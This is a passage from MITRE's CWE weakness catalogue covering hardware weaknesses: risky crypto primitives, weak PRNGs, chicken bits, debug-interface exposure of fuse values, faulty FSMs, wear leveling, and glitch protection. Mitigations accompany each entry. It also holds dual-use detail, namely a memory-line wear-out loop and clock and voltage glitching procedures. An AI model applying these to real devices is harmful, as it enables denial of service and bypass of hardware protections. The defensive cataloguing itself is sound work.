Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, Demonstrative_Examples, References + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-10-28 + updated Observed_Examples + + + CWE Content Team + MITRE + 2022-04-28 + updated Research_Gaps + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Boundary Beginning Violation ('Buffer Underwrite') + + + + To fulfill the need for a cryptographic primitive, the product implements a cryptographic algorithm using a non-standard, unproven, or disallowed/non-compliant cryptographic implementation. + + Cryptographic protocols and systems depend on cryptographic primitives (and associated algorithms) as their basic building blocks. Some common examples of primitives are digital signatures, one-way hash functions, ciphers, and public key cryptography; however, the notion of "primitive" can vary depending on point of view. See "Terminology Notes" for further explanation of some concepts. + Cryptographic primitives are defined to accomplish one very specific task in a precisely defined and mathematically reliable fashion. For example, suppose that for a specific cryptographic primitive (such as an encryption routine), the consensus is that the primitive can only be broken after trying out N different inputs (where the larger the value of N, the stronger the cryptography). For an encryption scheme like AES-256, one would expect N to be so large as to be infeasible to execute in a reasonable amount of time. + If a vulnerability is ever found that shows that one can break a cryptographic primitive in significantly less than the expected number of attempts, then that primitive is considered weakened (or sometimes in extreme cases, colloquially it is "broken"). As a result, anything using this cryptographic primitive would now be considered insecure or risky. Thus, even breaking or weakening a seemingly small cryptographic primitive has the potential to render the whole system vulnerable, due to its reliance on the primitive. A historical example can be found in TLS when using DES. One would colloquially call DES the cryptographic primitive for transport encryption in this version of TLS. In the past, DES was considered strong, because no weaknesses were found in it; importantly, DES has a key length of 56 bits. Trying N=2^56 keys was considered impractical for most actors. Unfortunately, attacking a system with 56-bit keys is now practical via brute force, which makes defeating DES encryption practical. It is now practical for an adversary to read any information sent under this version of TLS and use this information to attack the system. As a result, it can be claimed that this use of TLS is weak, and that any system depending on TLS with DES could potentially render the entire system vulnerable to attack. + + Cryptographic primitives and associated algorithms are only considered safe after extensive research and review from experienced cryptographers from academia, industry, and government entities looking for any possible flaws. Furthermore, cryptographic primitives and associated algorithms are frequently reevaluated for safety when new mathematical and attack techniques are discovered. As a result and over time, even well-known cryptographic primitives can lose their compliance status with the discovery of novel attacks that might either defeat the algorithm or reduce its robustness significantly. + If ad-hoc cryptographic primitives are implemented, it is almost certain that the implementation will be vulnerable to attacks that are well understood by cryptographers, resulting in the exposure of sensitive information and other consequences. + This weakness is even more difficult to manage for hardware-implemented deployment of cryptographic algorithms. First, because hardware is not patchable as easily as software, any flaw discovered after release and production typically cannot be fixed without a recall of the product. Secondly, the hardware product is often expected to work for years, during which time computation power available to the attacker only increases. Therefore, for hardware implementations of cryptographic primitives, it is absolutely essential that only strong, proven cryptographic primitives are used. + + + + + + + Primary + + + + + + + + + + + Architecture and Design + This weakness is primarily introduced during the architecture and design phase as risky primitives are included. + + + Implementation + Even in cases where the Architectural phase properly specifies a cryptographically secure design, the design may be changed during implementation due to unforeseen constraints. + + + + + Confidentiality + Read Application Data + High + Incorrect usage of crypto primitives could render the supposedly encrypted data as unencrypted plaintext in the worst case. + + + + + Architecture or Design Review + Review requirements, documentation, and product design to ensure that primitives are consistent with the strongest-available recommendations from trusted parties. If the product appears to be using custom or proprietary implementations that have not had sufficient public review and approval, then this is a significant concern. + High + + + Manual Analysis + Analyze the product to ensure that implementations for each primitive do not contain any known vulnerabilities and are not using any known-weak algorithms, including MD4, MD5, SHA1, DES, etc. + Moderate + + + Dynamic Analysis with Manual Results Interpretation + For hardware, during the implementation (pre-Silicon / post-Silicon) phase, dynamic tests should be done to ensure that outputs from cryptographic routines are indeed working properly, such as test vectors provided by NIST [REF-1236]. + Moderate + + + Dynamic Analysis with Manual Results Interpretation + + It needs to be determined if the output of a cryptographic primitive is lacking entropy, which is one clear sign that something went wrong with the crypto implementation. There exist many methods of measuring the entropy of a bytestream, from sophisticated ones (like calculating Shannon's entropy of a sequence of characters) to crude ones (by compressing it and comparing the size of the original bytestream vs. the compressed - a truly random byte stream should not be compressible and hence the uncompressed and compressed bytestreams should be nearly identical in size). + Moderate + + + + + Requirements + + Require compliance with the strongest-available recommendations from trusted parties, and require that compliance must be kept up-to-date, since recommendations evolve over time. For example, US government systems require FIPS 140-3 certification, which supersedes FIPS 140-2 [REF-1192] [REF-1226]. + + High + + + Architecture and Design + + Ensure that the architecture/design uses the strongest-available primitives and algorithms from trusted parties. For example, US government systems require FIPS 140-3 certification, which supersedes FIPS 140-2 [REF-1192] [REF-1226]. + + High + + + Architecture and Design + + Do not develop custom or private cryptographic algorithms. They will likely be exposed to attacks that are well-understood by cryptographers. As with all cryptographic mechanisms, the source code should be available for analysis. If the algorithm may be compromised when attackers find out how it works, then it is especially weak. + + Discouraged Common Practice + + + Architecture and Design + + Try not to use cryptographic algorithms in novel ways or with new modes of operation even when you "know" it is secure. For example, using SHA-2 chaining to create a 1-time pad for encryption might sound like a good idea, but one should not do this. + + Discouraged Common Practice + + + Architecture and Design + Ensure that the design can replace one cryptographic primitive or algorithm with another in the next generation ("cryptographic agility"). Where possible, use wrappers to make the interfaces uniform. This will make it easier to upgrade to stronger algorithms. This is especially important for hardware, which can be more difficult to upgrade quickly than software; design the hardware at a replaceable block level. + Defense in Depth + + + Architecture and Design + + Do not use outdated or non-compliant cryptography algorithms. Some older algorithms, once thought to require a billion years of computing time, can now be broken in days or hours. This includes MD4, MD5, SHA1, DES, and other algorithms that were once regarded as strong [REF-267]. + + Discouraged Common Practice + + + Architecture and Design + Implementation + + Do not use a linear-feedback shift register (LFSR) or other legacy methods as a substitute for an accepted and standard Random Number Generator. + + Discouraged Common Practice + + + Architecture and Design + Implementation + + Do not use a checksum as a substitute for a cryptographically generated hash. + + Discouraged Common Practice + + + Architecture and Design + Libraries or Frameworks + + Use a vetted cryptographic library or framework. Industry-standard implementations will save development time and are more likely to avoid errors that can occur during implementation of cryptographic algorithms. However, the library/framework could be used incorrectly during implementation. + + High + + + Architecture and Design + Implementation + + When using industry-approved techniques, use them correctly. Don't cut corners by skipping resource-intensive steps (CWE-325). These steps are often essential for the prevention of common attacks. + + Moderate + + + Architecture and Design + Implementation + + Do not store keys in areas accessible to untrusted agents. Carefully manage and protect the cryptographic keys (see CWE-320). If the keys can be guessed or stolen, then the strength of the cryptography algorithm is irrelevant. + + Moderate + + + + + Re-using random values may compromise security. + Suppose an Encryption algorithm needs a random value for a key. Instead of using a DRNG (Deterministic Random Number Generator), the designer uses a linear-feedback shift register (LFSR) to generate the value. + While an LFSR may provide pseudo-random number generation service, the entropy (measure of randomness) of the resulting output may be less than that of an accepted DRNG (like that used in dev/urandom). Thus, using an LFSR weakens the strength of the cryptographic system, because it may be possible for an attacker to guess the LFSR output and subsequently the encryption key. + If a cryptographic algorithm expects a random number as its input, provide one. Do not provide a pseudo-random value. + + + + + CVE-2020-4778 + software uses MD5, which is less safe than the default SHA-256 used by related products + https://www.cve.org/CVERecord?id=CVE-2020-4778 + + + CVE-2005-2946 + Default configuration of product uses MD5 instead of stronger algorithms that are available, simplifying forgery of certificates. + https://www.cve.org/CVERecord?id=CVE-2005-2946 + + + CVE-2019-3907 + identity card uses MD5 hash of a salt and password + https://www.cve.org/CVERecord?id=CVE-2019-3907 + + + CVE-2021-34687 + personal key is transmitted over the network using a substitution cipher + https://www.cve.org/CVERecord?id=CVE-2021-34687 + + + CVE-2020-14254 + product does not disable TLS-RSA cipher suites, allowing decryption of traffic if TLS 2.0 and secure ciphers are not enabled. + https://www.cve.org/CVERecord?id=CVE-2020-14254 + + + CVE-2019-1543 + SSL/TLS library generates 16-byte nonces but reduces them to 12 byte nonces for the ChaCha20-Poly1305 cipher, converting them in a way that violates the cipher's requirements for unique nonces. + https://www.cve.org/CVERecord?id=CVE-2019-1543 + + + CVE-2017-9267 + LDAP interface allows use of weak ciphers + https://www.cve.org/CVERecord?id=CVE-2017-9267 + + + CVE-2017-7971 + SCADA product allows "use of outdated cipher suites" + https://www.cve.org/CVERecord?id=CVE-2017-7971 + + + CVE-2020-6616 + Chip implementing Bluetooth uses a low-entropy PRNG instead of a hardware RNG, allowing spoofing. + https://www.cve.org/CVERecord?id=CVE-2020-6616 + + + CVE-2019-1715 + security product has insufficient entropy in the DRBG, allowing collisions and private key discovery + https://www.cve.org/CVERecord?id=CVE-2019-1715 + + + CVE-2014-4192 + Dual_EC_DRBG implementation in RSA toolkit does not correctly handle certain byte requests, simplifying plaintext recovery + https://www.cve.org/CVERecord?id=CVE-2014-4192 + + + CVE-2007-6755 + Recommendation for Dual_EC_DRBG algorithm contains point Q constants that could simplify decryption + https://www.cve.org/CVERecord?id=CVE-2007-6755 + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + + Terminology for cryptography varies widely, from informal and colloquial to mathematically-defined, with different precision and formalism depending on whether the stakeholder is a developer, cryptologist, etc. Yet there is a need for CWE to be self-consistent while remaining understandable and acceptable to multiple audiences. + As of CWE 4.6, CWE terminology around "primitives" and "algorithms" is emerging as shown by the following example, subject to future consultation and agreement within the CWE and cryptography communities. Suppose one wishes to send encrypted data using a CLI tool such as OpenSSL. One might choose to use AES with a 256-bit key and require tamper protection (GCM mode, for instance). For compatibility's sake, one might also choose the ciphertext to be formatted to the PKCS#5 standard. In this case, the "cryptographic system" would be AES-256-GCM with PKCS#5 formatting. The "cryptographic function" would be AES-256 in the GCM mode of operation, and the "algorithm" would be AES. Colloquially, one would say that AES (and sometimes AES-256) is the "cryptographic primitive," because it is the algorithm that realizes the concept of symmetric encryption (without modes of operation or other protocol related modifications). In practice, developers and architects typically refer to base cryptographic algorithms (AES, SHA, etc.) as cryptographic primitives. + + Since CWE 4.4, various cryptography-related entries, including CWE-327 and CWE-1240, have been slated for extensive research, analysis, and community consultation to define consistent terminology, improve relationships, and reduce overlap or duplication. As of CWE 4.6, this work is still ongoing. + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-02-10 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns, Research_Gaps + + + CWE Content Team + MITRE + 2021-07-20 + updated Maintenance_Notes, Research_Gaps + + + CWE Content Team + MITRE + 2021-10-28 + updated Background_Details, Demonstrative_Examples, Description, Detection_Factors, Maintenance_Notes, Name, Observed_Examples, Potential_Mitigations, References, Relationships, Terminology_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Parbati K. Manna + Intel Corporation + 2021-10-18 + provided detection methods and observed examples + + Use of a Risky Cryptographic Primitive + + + + The device uses an algorithm that is predictable and generates a pseudo-random number. + + + + + + + + + Architecture and Design + + + Implementation + In many cases, the design originally defines a cryptographically secure random number generator, but is then changed during implementation due to unforeseen constraints. + + + + + Confidentiality + Read Application Data + High + + + + + Architecture and Design + A true random number generator should be specified for cryptographic algorithms. + + + Implementation + A true random number generator should be implemented for cryptographic algorithms. + + + + + Suppose a cryptographic function expects random value to be supplied for the crypto algorithm. + During the implementation phase, due to space constraint, a cryptographically secure random-number-generator could not be used, and instead of using a TRNG (True Random Number Generator), a LFSR (Linear Feedback Shift Register) is used to generate a random value. While an LFSR will provide a pseudo-random number, its entropy (measure of randomness) is insufficient for a cryptographic algorithm. + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + As of CWE 4.5, terminology related to randomness, entropy, and + predictability can vary widely. Within the developer and other + communities, "randomness" is used heavily. However, within + cryptography, "entropy" is distinct, typically implied as a + measurement. There are no commonly-used definitions, even within + standards documents and cryptography papers. Future versions of + CWE will attempt to define these terms and, if necessary, + distinguish between them in ways that are appropriate for + different communities but do not reduce the usability of CWE for + mapping, understanding, or other scenarios. + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-02-10 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-06-25 + updated Common_Consequences, Demonstrative_Examples, Modes_of_Introduction + + + CWE Content Team + MITRE + 2020-08-20 + updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns, Research_Gaps + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes, Research_Gaps + + + CWE Content Team + MITRE + 2021-07-20 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The device includes chicken bits or undocumented features that can create entry points for unauthorized actors. + + A common design practice is to use undocumented bits on a device that can be used to disable certain functional security features. These bits are commonly referred to as "chicken bits". They can facilitate quick identification and isolation of faulty components, features that negatively affect performance, or features that do not provide the required controllability for debug and test. Another way to achieve this is through implementation of undocumented features. An attacker might exploit these interfaces for unauthorized access. + + + + + + + + + + + + + + Architecture and Design + + + Implementation + + + Documentation + + + + + Confidentiality + Integrity + Availability + Access Control + Modify Memory + Read Memory + Execute Unauthorized Code or Commands + Gain Privileges or Assume Identity + Bypass Protection Mechanism + + + + + Architecture and Design + Implementation + + The implementation of chicken bits in a released product is highly discouraged. If implemented at all, ensure that they are disabled in production devices. All interfaces to a device should be documented. + + High + + + + + Consider a device that comes with various security measures, such as secure boot. The secure-boot process performs firmware-integrity verification at boot time, and this code is stored in a separate SPI-flash device. However, this code contains undocumented "special access features" intended to be used only for performing failure analysis and intended to only be unlocked by the device designer. + + Attackers dump the code from the device and then perform reverse engineering to analyze the code. The undocumented, special-access features are identified, and attackers can activate them by sending specific commands via UART before secure-boot phase completes. Using these hidden features, attackers can perform reads and writes to memory via the UART interface. At runtime, the attackers can also execute arbitrary code and dump the entire memory contents. + + Remove all chicken bits and hidden features that are exposed to attackers. Add authorization schemes that rely on cryptographic primitives to access any features that the manufacturer does not want to expose. Clearly document all interfaces. + + + + + Part 4-1 + Req SD-4 + + + Part 4-1 + Req SVV-3 + + + Part 4-2 + Req CR2.12 + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-02-13 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Applicable_Platforms, Demonstrative_Examples, Description, Potential_Mitigations, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Taxonomy_Mappings + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-04-25 + Suggested mappings to ISA/IEC 62443. + + + + + Access to security-sensitive information stored in fuses is not limited during debug. + + Several security-sensitive values are programmed into fuses to be used during early-boot flows or later at runtime. Examples of these security-sensitive values include root keys, encryption keys, manufacturing-specific information, chip-manufacturer-specific information, and original-equipment-manufacturer (OEM) data. After the chip is powered on, these values are sensed from fuses and stored in temporary locations such as registers and local memories. These locations are typically access-control protected from untrusted agents capable of accessing them. Even to trusted agents, only read-access is provided. However, these locations are not blocked during debug operations, allowing a user to access this sensitive information. + + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Access Control + Modify Memory + Bypass Protection Mechanism + + + + + Architecture and Design + Implementation + + Disable access to security-sensitive information stored in fuses directly and also reflected from temporary storage locations when in debug mode. + + + + + + Sensitive manufacturing data (such as die information) are stored in fuses. When the chip powers on, these values are read from the fuses and stored in microarchitectural registers. These registers are only given read access to trusted software running on the core. Untrusted software running on the core is not allowed to access these registers. + + All microarchitectural registers in this chip can be accessed through the debug interface. As a result, even an untrusted debugger can access this data and retrieve sensitive manufacturing data. + + + Registers used to store sensitive values read from fuses should be blocked during debug. These registers should be disconnected from the debug interface. + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-02-12 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Potential_Mitigations, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-03-15 + updated Description + + + CWE Content Team + MITRE + 2021-07-20 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Exposure of Security-Sensitive Fuse Values During Debug + + + + + The product uses physical debug or test + interfaces with support for multiple access levels, but it + assigns the wrong debug access level to an internal asset, + providing unintended access to the asset from untrusted debug + agents. + + + Debug authorization can have multiple levels of + access, defined such that different system internal assets + are accessible based on the current authorized debug + level. Other than debugger authentication (e.g., using + passwords or challenges), the authorization can also be + based on the system state or boot stage. For example, full + system debug access might only be allowed early in boot + after a system reset to ensure that previous session data is + not accessible to the authenticated debugger. + + If this protection mechanism does not ensure that + internal assets have the correct debug access level during + each boot stage or change in system state, an attacker could + obtain sensitive information from the internal asset using a + debugger. + + + + + + + Primary + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Read Memory + + + Integrity + Modify Memory + + + Authorization + Access Control + Gain Privileges or Assume Identity + Bypass Protection Mechanism + + + + + Manual Analysis + Check 2 devices for their passcode to authenticate access to JTAG/debugging ports. If the passcodes are missing or the same, update the design to fix and retest. Check communications over JTAG/debugging ports for encryption. If the communications are not encrypted, fix the design and retest. + Moderate + + + + + Architecture and Design + Implementation + + For security-sensitive assets accessible over debug/test interfaces, only allow trusted agents. + + High + + + Architecture and Design + Apply blinding [REF-1219] or masking techniques in strategic areas. + Limited + + + Implementation + Add shielding or tamper-resistant protections to the device, which increases the difficulty and cost for accessing debug/test interfaces. + Limited + + + + + The JTAG interface is used to perform debugging and provide CPU core access for developers. JTAG-access protection is implemented as part of the JTAG_SHIELD bit in the hw_digctl_ctrl register. This register has no default value at power up and is set only after the system boots from ROM and control is transferred to the user software. + + + + + 1 bit + 0x0 = JTAG debugger is enabled (default) + + + JTAG_SHIELD + 0x1 = JTAG debugger is disabled + + + + + This means that since the end user has access to JTAG at system reset and during ROM code execution before control is transferred to user software, a JTAG user can modify the boot flow and subsequently disclose all CPU information, including data-encryption keys. + + The default value of this register bit should be set to 1 to prevent the JTAG from being enabled at system reset. + + + + + + CVE-2019-18827 + After ROM code execution, JTAG access is disabled. But before the ROM code is executed, JTAG access is possible, allowing a user full system access. This allows a user to modify the boot flow and successfully bypass the secure-boot process. + https://www.cve.org/CVERecord?id=CVE-2019-18827 + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE-1191 and CWE-1244 both involve physical debug access, + but the weaknesses are different. CWE-1191 is effectively + about missing authorization for a debug interface, + i.e. JTAG. CWE-1244 is about providing internal assets with + the wrong debug access level, exposing the asset to + untrusted debug agents. + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-02-12 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Demonstrative_Examples, Name, Observed_Examples, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2021-10-28 + updated Demonstrative_Examples, Description, Detection_Factors, Maintenance_Notes, Name, Observed_Examples, Potential_Mitigations, References, Relationship_Notes, Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2022-04-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Hareesh Khattri + Intel Corporation + 2021-10-22 + clarified differences between CWE-1191 and CWE-1244, and suggested rephrasing of descriptions and names. + + Improper Authorization on Physical Debug and Test Interfaces + Improper Access to Sensitive Information Using Debug and Test Interfaces + + + + Faulty finite state machines (FSMs) in the hardware logic allow an attacker to put the system in an undefined state, to cause a denial of service (DoS) or gain privileges on the victim's system. + + The functionality and security of the system heavily depend on the implementation of FSMs. FSMs can be used to indicate the current security state of the system. Lots of secure data operations and data transfers rely on the state reported by the FSM. Faulty FSM designs that do not account for all states, either through undefined states (left as don't cares) or through incorrect implementation, might lead an attacker to drive the system into an unstable state from which the system cannot recover without a reset, thus causing a DoS. Depending on what the FSM is used for, an attacker might also gain additional privileges to launch further attacks and compromise the security guarantees. + + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Availability + Access Control + Unexpected State + DoS: Crash, Exit, or Restart + DoS: Instability + Gain Privileges or Assume Identity + + + + + Architecture and Design + Implementation + Define all possible states and handle all unused states through default statements. Ensure that system defaults to a secure state. + High + + + + + The Finite State Machine (FSM) shown in the "bad" code snippet below assigns the output ("out") based on the value of state, which is determined based on the user provided input ("user_input"). + + module fsm_1(out, user_input, clk, rst_n); + input [2:0] user_input; + input clk, rst_n; + output reg [2:0] out; + reg [1:0] state; + always @ (posedge clk or negedge rst_n ) + + begin + + + if (!rst_n) + + state = 3'h0; + + else + case (user_input) + + 3'h0: + 3'h1: + 3'h2: + 3'h3: state = 2'h3; + 3'h4: state = 2'h2; + 3'h5: state = 2'h1; + + endcase + + end + out <= {1'h1, state}; + + endmodule + + + + The case statement does not include a default to handle the scenario when the user provides inputs of 3'h6 and 3'h7. Those inputs push the system to an undefined state and might cause a crash (denial of service) or any other unanticipated outcome. + Adding a default statement to handle undefined inputs mitigates this issue. This is shown in the "Good" code snippet below. The default statement is in bold. + + + case (user_input) + 3'h0: + 3'h1: + 3'h2: + 3'h3: state = 2'h3; + 3'h4: state = 2'h2; + 3'h5: state = 2'h1; + default: state = 2'h0; + + endcase + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + The Intel Corporation + 2020-02-12 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not implement or incorrectly implements wear leveling operations in limited-write non-volatile memories. + + Non-volatile memories such as NAND Flash, EEPROM, etc. have individually erasable segments, each of which can be put through a limited number of program/erase or write cycles. For example, the device can only endure a limited number of writes, after which the device becomes unreliable. In order to wear out the cells in a uniform manner, non-volatile memory and storage products based on the above-mentioned technologies implement a technique called wear leveling. Once a set threshold is reached, wear leveling maps writes of a logical block to a different physical block. This prevents a single physical block from prematurely failing due to a high concentration of writes. If wear leveling is improperly implemented, attackers may be able to programmatically cause the storage to become unreliable within a much shorter time than would normally be expected. + + + + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Availability + DoS: Instability + + + + + Architecture and Design + Implementation + Testing + + Include secure wear leveling algorithms and ensure they may not be bypassed. + + High + + + + + An attacker can render a memory line unusable by repeatedly causing a write to the memory line. + Below is example code from [REF-1058] that the user can execute repeatedly to cause line failure. W is the maximum associativity of any cache in the system; S is the size of the largest cache in the system. + + // Do aligned alloc of (W+1) arrays each of size S + while(1) { + + for (ii = 0; ii < W + 1; ii++) + + array[ii].element[0]++; + + + } + + Without wear leveling, the above attack will be successful. Simple randomization of blocks will not suffice as instead of the original physical block, the randomized physical block will be worn out. + + Wear leveling must be used to even out writes to the device. + + + + + + Part 4-1 + Req SD-4 + + + Part 4-1 + Req SI-1 + + + Part 4-1 + Req SVV-3 + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2020-02-10 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Demonstrative_Examples, Description, Potential_Mitigations, Research_Gaps + + + CWE Content Team + MITRE + 2021-07-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2022-06-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples, Relationships, Research_Gaps + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-04-25 + Suggested mappings to ISA/IEC 62443. + + + + + The device does not contain or contains incorrectly implemented circuitry or sensors to detect and mitigate voltage and clock glitches and protect sensitive information or software contained on the device. + + A device might support features such as secure boot which are supplemented with hardware and firmware support. This involves establishing a chain of trust, starting with an immutable root of trust by checking the signature of the next stage (culminating with the OS and runtime software) against a golden value before transferring control. The intermediate stages typically set up the system in a secure state by configuring several access control settings. Similarly, security logic for exercising a debug or testing interface may be implemented in hardware, firmware, or both. A device needs to guard against fault attacks such as voltage glitches and clock glitches that an attacker may employ in an attempt to compromise the system. + + + + + + + Primary + + + + + + + + + + + + + + + Operation + + + + + Confidentiality + Integrity + Availability + Access Control + Gain Privileges or Assume Identity + Bypass Protection Mechanism + Read Memory + Modify Memory + Execute Unauthorized Code or Commands + + + + + Manual Analysis + + + Put the processor in an infinite + loop, which is then followed by instructions + that should not ever be executed, since the + loop is not expected to exit. After the loop, + toggle an I/O bit (for oscilloscope monitoring + purposes), print a console message, and + reenter the loop. Note that to ensure that + the loop exit is actually captured, many NOP + instructions should be coded after the loop + branch instruction and before the I/O bit + toggle and the print statement. + + Margining the clock consists of varying the clock + frequency until an anomaly occurs. This could be a + continuous frequency change or it could be a single + cycle. The single cycle method is described here. For + every 1000th clock pulse, the clock cycle is shortened by + 10 percent. If no effect is observed, the width is + shortened by 20%. This process is continued in 10% + increments up to and including 50%. Note that the cycle + time may be increased as well, down to seconds per + cycle. + + Separately, the voltage is margined. Note that + the voltage could be increased or decreased. Increasing + the voltage has limits, as the circuitry may not be able + to withstand a drastically increased voltage. This process + starts with a 5% reduction of the DC supply to the CPU + chip for 5 millisecond repeated at 1KHz. If this has no + effect, the process is repeated, but a 10% reduction is + used. This process is repeated at 10% increments down to a + 50% reduction. If no effects are observed at 5 + millisecond, the whole process is repeated using a 10 + millisecond pulse. If no effects are observed, the process + is repeated in 10 millisecond increments out to 100 + millisecond pulses. + + While these are suggested starting points for + testing circuitry for weaknesses, the limits may need to + be pushed further at the risk of device damage. See + [REF-1217] for descriptions of Smart Card attacks against + a clock (section 14.6.2) and using a voltage glitch + (section 15.5.3). + + Moderate + + + Dynamic Analysis with Manual Results Interpretation + + During the implementation phase where actual hardware is available, specialized hardware tools and apparatus such as ChipWhisperer may be used to check if the platform is indeed susceptible to voltage and clock glitching attacks. + + + + Architecture or Design Review + + Review if the protections against glitching merely transfer the attack target. For example, suppose a critical authentication routine that an attacker would want to bypass is given the protection of modifying certain artifacts from within that specific routine (so that if the routine is bypassed, one can examine the artifacts and figure out that an attack must have happened). However, if the attacker has the ability to bypass the critical authentication routine, they might also have the ability to bypass the other protection routine that checks the artifacts. Basically, depending on these kind of protections is akin to resorting to "Security by Obscurity". + + + + Architecture or Design Review + + Many SoCs come equipped with a built-in Dynamic Voltage and Frequency Scaling (DVFS) that can control the voltage and clocks via software alone. However, there have been demonstrated attacks (like Plundervolt and CLKSCREW) 